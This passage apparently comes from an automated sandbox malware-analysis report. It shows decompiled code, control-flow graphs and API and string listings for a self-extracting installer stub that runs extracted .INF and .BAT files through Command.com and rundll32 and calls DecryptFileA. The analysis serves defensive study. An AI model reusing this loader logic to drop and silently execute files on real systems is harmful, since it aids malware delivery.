                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: LockResource.KERNEL32(00000000,?,00102D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001046D3
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: memcpy_s.MSVCRT ref: 001046E5
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001046EF
                                                                                                                                                                                                                                                • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00108C42), ref: 00103D8F
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00103E26
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00108C42), ref: 00103EFF
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,00108C42), ref: 00103F1F
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00108C42), ref: 00103F40
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,00108C42), ref: 00103F47
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00108C42), ref: 00103F76
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00108C42), ref: 00103F80
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00108C42), ref: 00103FC2
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                                                                • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$lenta
                                                                                                                                                                                                                                                • API String ID: 1032054927-1973600120
                                                                                                                                                                                                                                                • Opcode ID: 7a82337ef2f627030c68ca06bd5d39a9418a763dcb9741ea19e79606682bbcf0
                                                                                                                                                                                                                                                • Instruction ID: 4cd9ca62a29206803c4f59ffc74dd1096779f1da54dc89d0fc538147ebf7be94
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a82337ef2f627030c68ca06bd5d39a9418a763dcb9741ea19e79606682bbcf0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 15B1F2B06083019BE720DF64C945B6B76E8EB94710F104A2EFAE5D65E1DBF4C984CB92
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00101AE8 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 291memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 141 101ae8-101b2c call 101680 144 101b3b-101b40 141->144 145 101b2e-101b39 141->145 146 101b46-101b61 call 101a84 144->146 145->146 149 101b63-101b65 146->149 150 101b9f-101bc2 call 101781 call 10658a 146->150 151 101b68-101b6d 149->151 159 101bc7-101bd3 call 1066c8 150->159 151->151 153 101b6f-101b74 151->153 153->150 155 101b76-101b7b 153->155 157 101b83-101b86 155->157 158 101b7d-101b81 155->158 157->150 162 101b88-101b8a 157->162 158->157 161 101b8c-101b9d call 101680 158->161 165 101d73-101d7f call 1066c8 159->165 166 101bd9-101bf1 CompareStringA 159->166 161->159 162->150 162->161 175 101d81-101d99 CompareStringA 165->175 176 101df8-101e09 LocalAlloc 165->176 166->165 168 101bf7-101c07 GetFileAttributesA 166->168 170 101d53-101d5e 168->170 171 101c0d-101c15 168->171 173 101d64-101d6e call 1044b9 170->173 171->170 174 101c1b-101c33 call 101a84 171->174 187 101e94-101ea4 call 106ce0 173->187 189 101c50-101c61 LocalAlloc 174->189 190 101c35-101c38 174->190 175->176 181 101d9b-101da2 175->181 178 101dd4-101ddf 176->178 179 101e0b-101e1b GetFileAttributesA 176->179 178->173 183 101e67-101e73 call 101680 179->183 184 101e1d-101e1f 179->184 186 101da5-101daa 181->186 199 101e78-101e84 call 102aac 183->199 184->183 188 101e21-101e3e call 101781 184->188 186->186 191 101dac-101db4 186->191 188->199 210 101e40-101e43 188->210 189->178 198 101c67-101c72 189->198 195 101c40-101c4b call 101a84 190->195 196 101c3a 190->196 197 101db7-101dbc 191->197 195->189 196->195 197->197 203 101dbe-101dd2 LocalAlloc 197->203 204 101c74 198->204 205 101c79-101cc0 GetPrivateProfileIntA GetPrivateProfileStringA 198->205 209 101e89-101e92 199->209 203->178 211 101de1-101df3 call 10171e 203->211 204->205 207 101cc2-101ccc 205->207 208 101cf8-101d07 205->208 212 101cd3-101cf3 call 101680 * 2 207->212 213 101cce 207->213 215 101d23 208->215 216 101d09-101d21 GetShortPathNameA 208->216 209->187 210->199 214 101e45-101e65 call 1016b3 * 2 210->214 211->209 212->209 213->212 214->199 220 101d28-101d2b 215->220 216->220 224 101d32-101d4e call 10171e 220->224 225 101d2d 220->225 224->209 225->224
                                                                                                                                                                                                                                                C-Code - Quality: 82%
                                                                                                                                                                                                                                                			E00101AE8(long __ecx, CHAR** _a4, int* _a8) {
				signed int _v8;
				char _v268;
				char _v527;
				char _v528;
				char _v1552;
				CHAR* _v1556;
				int* _v1560;
				CHAR** _v1564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t48;
				CHAR* _t53;
				CHAR* _t54;
				char* _t57;
				char* _t58;
				CHAR* _t60;
				void* _t62;
				signed char _t65;
				intOrPtr _t76;
				intOrPtr _t77;
				unsigned int _t85;
				CHAR* _t90;
				CHAR* _t92;
				char _t105;
				char _t106;
				CHAR** _t111;
				CHAR* _t115;
				intOrPtr* _t125;
				void* _t126;
				CHAR* _t132;
				CHAR* _t135;
				void* _t138;
				void* _t139;
				void* _t145;
				intOrPtr* _t146;
				char* _t148;
				CHAR* _t151;
				void* _t152;
				CHAR* _t155;
				CHAR* _t156;
				void* _t157;
				signed int _t158;

				_t48 =  *0x108004; // 0xb5a2e1bc
				_v8 = _t48 ^ _t158;
				_t108 = __ecx;
				_v1564 = _a4;
				_v1560 = _a8;
				E00101680( &_v528, 0x104, __ecx);
				if(_v528 != 0x22) {
					_t135 = " ";
					_t53 =  &_v528;
				} else {
					_t135 = "\"";
					_t53 =  &_v527;
				}
				_t111 =  &_v1556;
				_v1556 = _t53;
				_t54 = E00101A84(_t111, _t135);
				_t156 = _v1556;
				_t151 = _t54;
				if(_t156 == 0) {
					L12:
					_push(_t111);
					E00101781( &_v268, 0x104, _t111, "C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");
					E0010658A( &_v268, 0x104, _t156);
					goto L13;
				} else {
					_t132 = _t156;
					_t148 =  &(_t132[1]);
					do {
						_t105 =  *_t132;
						_t132 =  &(_t132[1]);
					} while (_t105 != 0);
					_t111 = _t132 - _t148;
					if(_t111 < 3) {
						goto L12;
					}
					_t106 = _t156[1];
					if(_t106 != 0x3a || _t156[2] != 0x5c) {
						if( *_t156 != 0x5c || _t106 != 0x5c) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						L11:
						E00101680( &_v268, 0x104, _t156);
						L13:
						_t138 = 0x2e;
						_t57 = E001066C8(_t156, _t138);
						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
							_t139 = 0x2e;
							_t115 = _t156;
							_t58 = E001066C8(_t115, _t139);
							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
								_t156 = LocalAlloc(0x40, 0x400);
								if(_t156 == 0) {
									goto L43;
								}
								_t65 = GetFileAttributesA( &_v268); // executed
								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
									E00101680( &_v1552, 0x400, _t108);
								} else {
									_push(_t115);
									_t108 = 0x400;
									E00101781( &_v1552, 0x400, _t115,  &_v268);
									if(_t151 != 0 &&  *_t151 != 0) {
										E001016B3( &_v1552, 0x400, " ");
										E001016B3( &_v1552, 0x400, _t151);
									}
								}
								_t140 = _t156;
								 *_t156 = 0;
								E00102AAC( &_v1552, _t156, _t156);
								goto L53;
							} else {
								_t108 = "Command.com /c %s";
								_t125 = "Command.com /c %s";
								_t145 = _t125 + 1;
								do {
									_t76 =  *_t125;
									_t125 = _t125 + 1;
								} while (_t76 != 0);
								_t126 = _t125 - _t145;
								_t146 =  &_v268;
								_t157 = _t146 + 1;
								do {
									_t77 =  *_t146;
									_t146 = _t146 + 1;
								} while (_t77 != 0);
								_t140 = _t146 - _t157;
								_t154 = _t126 + 8 + _t146 - _t157;
								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
								if(_t156 != 0) {
									E0010171E(_t156, _t154, "Command.com /c %s",  &_v268);
									goto L53;
								}
								goto L43;
							}
						} else {
							_t85 = GetFileAttributesA( &_v268);
							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
								_t140 = 0x525;
								_push(0);
								_push(0x10);
								_push(0);
								_t60 =  &_v268;
								goto L35;
							} else {
								_t140 = "[";
								_v1556 = _t151;
								_t90 = E00101A84( &_v1556, "[");
								if(_t90 != 0) {
									if( *_t90 != 0) {
										_v1556 = _t90;
									}
									_t140 = "]";
									E00101A84( &_v1556, "]");
								}
								_t156 = LocalAlloc(0x40, 0x200);
								if(_t156 == 0) {
									L43:
									_t60 = 0;
									_t140 = 0x4b5;
									_push(0);
									_push(0x10);
									_push(0);
									L35:
									_push(_t60);
									E001044B9(0, _t140);
									_t62 = 0;
									goto L54;
								} else {
									_t155 = _v1556;
									_t92 = _t155;
									if( *_t155 == 0) {
										_t92 = "DefaultInstall";
									}
									 *0x109120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
									 *_v1560 = 1;
									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x101140, _t156, 8,  &_v268) == 0) {
										 *0x109a34 =  *0x109a34 & 0xfffffffb;
										if( *0x109a40 != 0) {
											_t108 = "setupapi.dll";
										} else {
											_t108 = "setupx.dll";
											GetShortPathNameA( &_v268,  &_v268, 0x104);
										}
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										_push( &_v268);
										_push(_t155);
										E0010171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
									} else {
										 *0x109a34 =  *0x109a34 | 0x00000004;
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										E00101680(_t108, 0x104, _t155);
										_t140 = 0x200;
										E00101680(_t156, 0x200,  &_v268);
									}
									L53:
									_t62 = 1;
									 *_v1564 = _t156;
									L54:
									_pop(_t152);
									return E00106CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
								}
							}
						}
					}
				}
			}














































                                                                                                                                                                                                                                                0x00101af3
                                                                                                                                                                                                                                                0x00101afa
                                                                                                                                                                                                                                                0x00101b07
                                                                                                                                                                                                                                                0x00101b09
                                                                                                                                                                                                                                                0x00101b1a
                                                                                                                                                                                                                                                0x00101b20
                                                                                                                                                                                                                                                0x00101b2c
                                                                                                                                                                                                                                                0x00101b3b
                                                                                                                                                                                                                                                0x00101b40
                                                                                                                                                                                                                                                0x00101b2e
                                                                                                                                                                                                                                                0x00101b2e
                                                                                                                                                                                                                                                0x00101b33
                                                                                                                                                                                                                                                0x00101b33
                                                                                                                                                                                                                                                0x00101b46
                                                                                                                                                                                                                                                0x00101b4c
                                                                                                                                                                                                                                                0x00101b52
                                                                                                                                                                                                                                                0x00101b57
                                                                                                                                                                                                                                                0x00101b5d
                                                                                                                                                                                                                                                0x00101b61
                                                                                                                                                                                                                                                0x00101b9f
                                                                                                                                                                                                                                                0x00101b9f
                                                                                                                                                                                                                                                0x00101bb1
                                                                                                                                                                                                                                                0x00101bc2
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00101b63
                                                                                                                                                                                                                                                0x00101b63
                                                                                                                                                                                                                                                0x00101b65
                                                                                                                                                                                                                                                0x00101b68
                                                                                                                                                                                                                                                0x00101b68
                                                                                                                                                                                                                                                0x00101b6a
                                                                                                                                                                                                                                                0x00101b6b
                                                                                                                                                                                                                                                0x00101b6f
                                                                                                                                                                                                                                                0x00101b74
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00101b76
                                                                                                                                                                                                                                                0x00101b7b
                                                                                                                                                                                                                                                0x00101b86
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00101b8c
                                                                                                                                                                                                                                                0x00101b8c
                                                                                                                                                                                                                                                0x00101b98
                                                                                                                                                                                                                                                0x00101bc7
                                                                                                                                                                                                                                                0x00101bc9
                                                                                                                                                                                                                                                0x00101bcc
                                                                                                                                                                                                                                                0x00101bd3
                                                                                                                                                                                                                                                0x00101d75
                                                                                                                                                                                                                                                0x00101d76
                                                                                                                                                                                                                                                0x00101d78
                                                                                                                                                                                                                                                0x00101d7f
                                                                                                                                                                                                                                                0x00101e05
                                                                                                                                                                                                                                                0x00101e09
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00101e12
                                                                                                                                                                                                                                                0x00101e1b
                                                                                                                                                                                                                                                0x00101e73
                                                                                                                                                                                                                                                0x00101e21
                                                                                                                                                                                                                                                0x00101e21
                                                                                                                                                                                                                                                0x00101e28
                                                                                                                                                                                                                                                0x00101e37
                                                                                                                                                                                                                                                0x00101e3e
                                                                                                                                                                                                                                                0x00101e52
                                                                                                                                                                                                                                                0x00101e60
                                                                                                                                                                                                                                                0x00101e60
                                                                                                                                                                                                                                                0x00101e3e
                                                                                                                                                                                                                                                0x00101e79
                                                                                                                                                                                                                                                0x00101e7b
                                                                                                                                                                                                                                                0x00101e84
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00101d9b
                                                                                                                                                                                                                                                0x00101d9b
                                                                                                                                                                                                                                                0x00101da0
                                                                                                                                                                                                                                                0x00101da2
                                                                                                                                                                                                                                                0x00101da5
                                                                                                                                                                                                                                                0x00101da5
                                                                                                                                                                                                                                                0x00101da7
                                                                                                                                                                                                                                                0x00101da8
                                                                                                                                                                                                                                                0x00101dac
                                                                                                                                                                                                                                                0x00101dae
                                                                                                                                                                                                                                                0x00101db4
                                                                                                                                                                                                                                                0x00101db7
                                                                                                                                                                                                                                                0x00101db7
                                                                                                                                                                                                                                                0x00101db9
                                                                                                                                                                                                                                                0x00101dba
                                                                                                                                                                                                                                                0x00101dbe
                                                                                                                                                                                                                                                0x00101dc3
                                                                                                                                                                                                                                                0x00101dce
                                                                                                                                                                                                                                                0x00101dd2
                                                                                                                                                                                                                                                0x00101deb
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00101df0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00101dd2
                                                                                                                                                                                                                                                0x00101bf7
                                                                                                                                                                                                                                                0x00101bfe
                                                                                                                                                                                                                                                0x00101c07
                                                                                                                                                                                                                                                0x00101d55
                                                                                                                                                                                                                                                0x00101d5a
                                                                                                                                                                                                                                                0x00101d5b
                                                                                                                                                                                                                                                0x00101d5d
                                                                                                                                                                                                                                                0x00101d5e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00101c1b
                                                                                                                                                                                                                                                0x00101c1b
                                                                                                                                                                                                                                                0x00101c20
                                                                                                                                                                                                                                                0x00101c2c
                                                                                                                                                                                                                                                0x00101c33
                                                                                                                                                                                                                                                0x00101c38
                                                                                                                                                                                                                                                0x00101c3a
                                                                                                                                                                                                                                                0x00101c3a
                                                                                                                                                                                                                                                0x00101c40
                                                                                                                                                                                                                                                0x00101c4b
                                                                                                                                                                                                                                                0x00101c4b
                                                                                                                                                                                                                                                0x00101c5d
                                                                                                                                                                                                                                                0x00101c61
                                                                                                                                                                                                                                                0x00101dd4
                                                                                                                                                                                                                                                0x00101dd4
                                                                                                                                                                                                                                                0x00101dd6
                                                                                                                                                                                                                                                0x00101ddb
                                                                                                                                                                                                                                                0x00101ddc
                                                                                                                                                                                                                                                0x00101dde
                                                                                                                                                                                                                                                0x00101d64
                                                                                                                                                                                                                                                0x00101d64
                                                                                                                                                                                                                                                0x00101d67
                                                                                                                                                                                                                                                0x00101d6c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00101c67
                                                                                                                                                                                                                                                0x00101c67
                                                                                                                                                                                                                                                0x00101c6d
                                                                                                                                                                                                                                                0x00101c72
                                                                                                                                                                                                                                                0x00101c74
                                                                                                                                                                                                                                                0x00101c74
                                                                                                                                                                                                                                                0x00101c8e
                                                                                                                                                                                                                                                0x00101c99
                                                                                                                                                                                                                                                0x00101cc0
                                                                                                                                                                                                                                                0x00101cf8
                                                                                                                                                                                                                                                0x00101d07
                                                                                                                                                                                                                                                0x00101d23
                                                                                                                                                                                                                                                0x00101d09
                                                                                                                                                                                                                                                0x00101d14
                                                                                                                                                                                                                                                0x00101d1b
                                                                                                                                                                                                                                                0x00101d1b
                                                                                                                                                                                                                                                0x00101d2b
                                                                                                                                                                                                                                                0x00101d2d
                                                                                                                                                                                                                                                0x00101d2d
                                                                                                                                                                                                                                                0x00101d38
                                                                                                                                                                                                                                                0x00101d39
                                                                                                                                                                                                                                                0x00101d46
                                                                                                                                                                                                                                                0x00101cc2
                                                                                                                                                                                                                                                0x00101cc2
                                                                                                                                                                                                                                                0x00101ccc
                                                                                                                                                                                                                                                0x00101cce
                                                                                                                                                                                                                                                0x00101cce
                                                                                                                                                                                                                                                0x00101cdb
                                                                                                                                                                                                                                                0x00101ce6
                                                                                                                                                                                                                                                0x00101cee
                                                                                                                                                                                                                                                0x00101cee
                                                                                                                                                                                                                                                0x00101e89
                                                                                                                                                                                                                                                0x00101e91
                                                                                                                                                                                                                                                0x00101e92
                                                                                                                                                                                                                                                0x00101e94
                                                                                                                                                                                                                                                0x00101e97
                                                                                                                                                                                                                                                0x00101ea4
                                                                                                                                                                                                                                                0x00101ea4
                                                                                                                                                                                                                                                0x00101c61
                                                                                                                                                                                                                                                0x00101c07
                                                                                                                                                                                                                                                0x00101bd3
                                                                                                                                                                                                                                                0x00101b7b

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 00101BE7
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 00101BFE
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 00101C57
                                                                                                                                                                                                                                                • GetPrivateProfileIntA.KERNEL32 ref: 00101C88
                                                                                                                                                                                                                                                • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00101140,00000000,00000008,?), ref: 00101CB8
                                                                                                                                                                                                                                                • GetShortPathNameA.KERNEL32 ref: 00101D1B
                                                                                                                                                                                                                                                  • Part of subcall function 001044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00104518
                                                                                                                                                                                                                                                  • Part of subcall function 001044B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00104554
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                                                                • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                                                                • API String ID: 383838535-2112662285
                                                                                                                                                                                                                                                • Opcode ID: 5bfcd7bf0fedd82e3a4eacb44b3db00cd83d385005d4062ad3adb749566c7fb0
                                                                                                                                                                                                                                                • Instruction ID: 6c7eae040df3c803ed8bd39f176aa18c34b542bd41ef70cbdb47042f4bc192e5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5bfcd7bf0fedd82e3a4eacb44b3db00cd83d385005d4062ad3adb749566c7fb0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 54A137B0A00218BBEB249B24CC49BEA7769AF55310F144295F9D5A32D1DBF89EC6CB50
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00102F1D Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 120libraryfileloaderCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 450 102f1d-102f3d 451 102f6c-102f73 call 105164 450->451 452 102f3f-102f46 450->452 460 103041 451->460 461 102f79-102f80 call 1055a0 451->461 454 102f48 call 1051e5 452->454 455 102f5f-102f66 call 103a3f 452->455 462 102f4d-102f4f 454->462 455->451 455->460 465 103043-103053 call 106ce0 460->465 461->460 469 102f86-102fbe GetSystemDirectoryA call 10658a LoadLibraryA 461->469 462->460 463 102f55-102f5d 462->463 463->451 463->455 472 102fc0-102fd4 GetProcAddress 469->472 473 102ff7-103004 FreeLibrary 469->473 472->473 476 102fd6-102fee DecryptFileA 472->476 474 103006-10300c 473->474 475 103017-103024 SetCurrentDirectoryA 473->475 474->475 477 10300e call 10621e 474->477 478 103054-10305a 475->478 479 103026-10303c call 1044b9 call 106285 475->479 476->473 485 102ff0-102ff5 476->485 489 103013-103015 477->489 481 103065-10306c 478->481 482 10305c call 103b26 478->482 479->460 487 10307c-103089 481->487 488 10306e-103075 call 10256d 481->488 491 103061-103063 482->491 485->473 493 1030a1-1030a9 487->493 494 10308b-103091 487->494 498 10307a 488->498 489->460 489->475 491->460 491->481 496 1030b4-1030b7 493->496 497 1030ab-1030ad 493->497 494->493 499 103093 call 103ba2 494->499 496->465 497->496 501 1030af call 104169 497->501 498->487 504 103098-10309a 499->504 501->496 504->460 505 10309c 504->505 505->493
                                                                                                                                                                                                                                                C-Code - Quality: 82%
                                                                                                                                                                                                                                                			E00102F1D(void* __ecx, int __edx) {
				signed int _v8;
				char _v272;
				_Unknown_base(*)()* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t9;
				void* _t11;
				struct HWND__* _t12;
				void* _t14;
				int _t21;
				signed int _t22;
				signed int _t25;
				intOrPtr* _t26;
				signed int _t27;
				void* _t30;
				_Unknown_base(*)()* _t31;
				void* _t34;
				struct HINSTANCE__* _t36;
				intOrPtr _t41;
				intOrPtr* _t44;
				signed int _t46;
				int _t47;
				void* _t58;
				void* _t59;

				_t43 = __edx;
				_t9 =  *0x108004; // 0xb5a2e1bc
				_v8 = _t9 ^ _t46;
				if( *0x108a38 != 0) {
					L5:
					_t11 = E00105164(_t52);
					_t53 = _t11;
					if(_t11 == 0) {
						L16:
						_t12 = 0;
						L17:
						return E00106CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
					}
					_t14 = E001055A0(_t53); // executed
					if(_t14 == 0) {
						goto L16;
					} else {
						_t45 = 0x105;
						GetSystemDirectoryA( &_v272, 0x105);
						_t43 = 0x105;
						_t40 =  &_v272;
						E0010658A( &_v272, 0x105, "advapi32.dll");
						_t36 = LoadLibraryA( &_v272);
						_t44 = 0;
						if(_t36 != 0) {
							_t31 = GetProcAddress(_t36, "DecryptFileA");
							_v276 = _t31;
							if(_t31 != 0) {
								_t45 = _t47;
								_t40 = _t31;
								 *0x10a288("C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\", 0); // executed
								_v276();
								if(_t47 != _t47) {
									_t40 = 4;
									asm("int 0x29");
								}
							}
						}
						FreeLibrary(_t36);
						_t58 =  *0x108a24 - _t44; // 0x0
						if(_t58 != 0) {
							L14:
							_t21 = SetCurrentDirectoryA("C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\"); // executed
							if(_t21 != 0) {
								__eflags =  *0x108a2c - _t44; // 0x0
								if(__eflags != 0) {
									L20:
									__eflags =  *0x108d48 & 0x000000c0;
									if(( *0x108d48 & 0x000000c0) == 0) {
										_t41 =  *0x109a40; // 0x3, executed
										_t26 = E0010256D(_t41); // executed
										_t44 = _t26;
									}
									_t22 =  *0x108a24; // 0x0
									 *0x109a44 = _t44;
									__eflags = _t22;
									if(_t22 != 0) {
										L26:
										__eflags =  *0x108a38;
										if( *0x108a38 == 0) {
											__eflags = _t22;
											if(__eflags == 0) {
												E00104169(__eflags);
											}
										}
										_t12 = 1;
										goto L17;
									} else {
										__eflags =  *0x109a30 - _t22; // 0x0
										if(__eflags != 0) {
											goto L26;
										}
										_t25 = E00103BA2(); // executed
										__eflags = _t25;
										if(_t25 == 0) {
											goto L16;
										}
										_t22 =  *0x108a24; // 0x0
										goto L26;
									}
								}
								_t27 = E00103B26(_t40, _t44);
								__eflags = _t27;
								if(_t27 == 0) {
									goto L16;
								}
								goto L20;
							}
							_t43 = 0x4bc;
							E001044B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
							 *0x109124 = E00106285();
							goto L16;
						}
						_t59 =  *0x109a30 - _t44; // 0x0
						if(_t59 != 0) {
							goto L14;
						}
						_t30 = E0010621E(); // executed
						if(_t30 == 0) {
							goto L16;
						}
						goto L14;
					}
				}
				_t49 =  *0x108a24;
				if( *0x108a24 != 0) {
					L4:
					_t34 = E00103A3F(_t51);
					_t52 = _t34;
					if(_t34 == 0) {
						goto L16;
					}
					goto L5;
				}
				if(E001051E5(_t49) == 0) {
					goto L16;
				}
				_t51 =  *0x108a38;
				if( *0x108a38 != 0) {
					goto L5;
				}
				goto L4;
			}




























                                                                                                                                                                                                                                                0x00102f1d
                                                                                                                                                                                                                                                0x00102f28
                                                                                                                                                                                                                                                0x00102f2f
                                                                                                                                                                                                                                                0x00102f3d
                                                                                                                                                                                                                                                0x00102f6c
                                                                                                                                                                                                                                                0x00102f6c
                                                                                                                                                                                                                                                0x00102f71
                                                                                                                                                                                                                                                0x00102f73
                                                                                                                                                                                                                                                0x00103041
                                                                                                                                                                                                                                                0x00103041
                                                                                                                                                                                                                                                0x00103043
                                                                                                                                                                                                                                                0x00103053
                                                                                                                                                                                                                                                0x00103053
                                                                                                                                                                                                                                                0x00102f79
                                                                                                                                                                                                                                                0x00102f80
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00102f86
                                                                                                                                                                                                                                                0x00102f86
                                                                                                                                                                                                                                                0x00102f93
                                                                                                                                                                                                                                                0x00102f9e
                                                                                                                                                                                                                                                0x00102fa0
                                                                                                                                                                                                                                                0x00102fa6
                                                                                                                                                                                                                                                0x00102fb8
                                                                                                                                                                                                                                                0x00102fba
                                                                                                                                                                                                                                                0x00102fbe
                                                                                                                                                                                                                                                0x00102fc6
                                                                                                                                                                                                                                                0x00102fcc
                                                                                                                                                                                                                                                0x00102fd4
                                                                                                                                                                                                                                                0x00102fd6
                                                                                                                                                                                                                                                0x00102fd8
                                                                                                                                                                                                                                                0x00102fe0
                                                                                                                                                                                                                                                0x00102fe6
                                                                                                                                                                                                                                                0x00102fee
                                                                                                                                                                                                                                                0x00102ff0
                                                                                                                                                                                                                                                0x00102ff5
